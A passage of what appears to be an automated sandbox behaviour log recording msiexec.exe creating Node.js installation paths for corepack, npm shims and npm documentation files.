                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\CHANGELOG.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\LICENSE.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\README.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\package.json
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\corepack.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\npm.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\npx.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\pnpm.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\pnpx.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\yarn.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\yarnpkg.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\lib
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\dist\lib\corepack.cjs
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\corepack
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\corepack.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\corepack.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npm.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\npx.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpm.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\pnpx.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarn
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarn.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarn.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarnpkg
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarnpkg.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\yarnpkg.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\corepack
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\corepack.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\corepack.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npm.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npx.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpm.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\pnpx.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarn
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarn.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarn.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarnpkg
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarnpkg.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\yarnpkg.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\.npmrc
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\LICENSE
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\README.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\index.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\npmrc
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\package.json
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npm-cli.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npm.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npm.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npx
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npx-cli.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npx.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\npx.ps1
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\node-gyp-bin
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\node-gyp-bin\node-gyp
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\bin\node-gyp-bin\node-gyp.cmd
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-access.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-adduser.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-audit.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-bugs.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-cache.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-ci.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-completion.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-config.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-dedupe.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-deprecate.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-diff.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-dist-tag.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-docs.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-doctor.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-edit.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-exec.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-explain.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-explore.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-find-dupes.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-fund.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-help-search.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-help.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-hook.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-init.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-install-ci-test.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-install-test.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-install.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-link.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-login.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-logout.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-ls.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-org.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-outdated.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-owner.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-pack.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-ping.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-pkg.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-prefix.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-profile.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-prune.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-publish.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-query.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-rebuild.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-repo.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-restart.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-root.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-run-script.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-sbom.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-search.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-shrinkwrap.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-star.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-stars.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-start.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-stop.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-team.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-test.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-token.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-uninstall.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-unpublish.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-unstar.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-update.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-version.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-view.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-whoami.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npx.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\folders.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\install.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\npm-shrinkwrap-json.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\npmrc.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\package-json.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\configuring-npm\package-lock-json.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\config.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\dependency-selectors.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\developers.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\logging.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\orgs.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\package-spec.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\registry.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\removal.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\scope.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\scripts.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\workspaces.md
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\lib
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\lib\index.js
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-access.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-adduser.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-audit.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-bugs.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-cache.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-ci.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-completion.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-config.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-dedupe.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-deprecate.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-diff.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-dist-tag.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-docs.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-doctor.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-edit.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-exec.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-explain.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-explore.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-find-dupes.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-fund.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-help-search.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-help.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-hook.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-init.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-install-ci-test.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-install-test.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-install.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-link.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-login.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-logout.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-ls.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-org.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-outdated.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-owner.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-pack.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-ping.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-pkg.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-prefix.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-profile.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-prune.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-publish.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-query.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-rebuild.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-repo.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-restart.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-root.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-run-script.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-sbom.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-search.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-shrinkwrap.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-star.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-stars.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-start.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-stop.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-team.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-test.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-token.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-uninstall.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-unpublish.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-unstar.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-update.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-version.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-view.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-whoami.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npx.html
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\nodejs\node_modules\npm\docs\output\configuring-npm
